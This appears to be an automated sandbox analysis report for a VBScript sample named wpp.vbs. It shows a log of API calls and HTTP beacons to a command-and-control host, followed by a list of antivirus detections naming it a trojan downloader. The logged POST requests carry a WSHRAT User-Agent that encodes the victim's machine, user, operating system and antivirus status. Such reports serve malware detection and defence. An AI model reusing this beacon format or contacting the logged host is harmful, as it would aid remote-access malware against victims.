send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1112 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 412 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 408 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1084 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1

Generates some ICMP traffic

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

DrWeb	VBS.Siggen.8176
FireEye	VB:Trojan.Valyria.4537
McAfee	VBS/Agent.dy
VIPRE	VB:Trojan.Valyria.4537
Sangfor	Malware.Generic-VBS.Save.cefb6a89
Arcabit	VB:Trojan.Valyria.D11B9
Cyren	VBS/Dunihi.A
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.OXW
TrendMicro-HouseCall	TROJ_FRS.0NA103HH23
Avast	JS:Skiddo-A [Trj]
Cynet	Malicious (score: 99)
Kaspersky	Trojan.VBS.Agent.bdq
BitDefender	VB:Trojan.Valyria.4537
NANO-Antivirus	Trojan.Script.Agent.iwquii
MicroWorld-eScan	VB:Trojan.Valyria.4537
Emsisoft	VB:Trojan.Valyria.4537 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPTL
TrendMicro	TROJ_FRS.0NA103HH23
McAfee-GW-Edition	VBS/Agent.dy
Sophos	VBS/DwnLdr-ACDC
Avira	VBS/Dldr.Agent.VPTL
MAX	malware (ai score=87)
ZoneAlarm	Trojan.VBS.Agent.bdq
GData	VB:Trojan.Valyria.4537
Google	Detected
ALYac	VB:Trojan.Valyria.4537
Ikarus	Trojan-Downloader.VBS.Agent
Fortinet	VBS/Agent.OXW!tr
AVG	JS:Skiddo-A [Trj]

wpp.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All